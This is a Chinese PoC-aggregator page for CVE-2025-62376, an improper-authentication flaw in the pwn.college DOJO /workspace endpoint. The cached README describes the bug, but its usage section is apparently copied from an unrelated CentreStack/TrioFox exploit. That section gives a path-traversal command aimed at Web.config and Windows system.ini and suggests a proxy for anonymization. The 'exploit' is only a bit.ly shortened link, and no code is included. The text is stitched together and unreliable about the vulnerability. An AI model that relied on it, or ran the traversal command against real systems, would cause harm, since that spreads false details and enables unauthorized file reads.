POC详情: 9b578bd5894ace938ae51ebec588e0a84eca49b3

来源
关联漏洞
标题: DOJO 授权问题漏洞 (CVE-2025-62376)
描述:DOJO是pwn.college开源的一款JavaScript工具箱。 DOJO存在授权问题漏洞,该漏洞源于/workspace端点身份验证不当,可能导致未经授权访问Windows虚拟机。
介绍
# Improper Authentication in pwn.college DOJO Education Platform(CVE-2025-62376)

### Overview

The pwn.college DOJO platform has a vulnerability in its /workspace endpoint that allows unauthorized access to active Windows VMs. This flaw arises from the view_desktop function, which inadequately verifies user authorization. An attacker can exploit this by providing a user ID and an arbitrary password, thereby impersonating other users. 

### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)

### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the exploit: `python exploit.py --target <target_url> --file "/path/to/Web.config"`

Options:
- `--target`: URL of the vulnerable CentreStack/TrioFox instance.
- `--file`: Relative path to the file to include (e.g., "../../../../Windows/system.ini" for testing).
- `--proxy`: Optional HTTP proxy for anonymization.


### PoC Exploit - [href](http://bit.ly/46VVvzl)
文件快照

[4.0K] /data/pocs/9b578bd5894ace938ae51ebec588e0a84eca49b3 └── [ 992] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。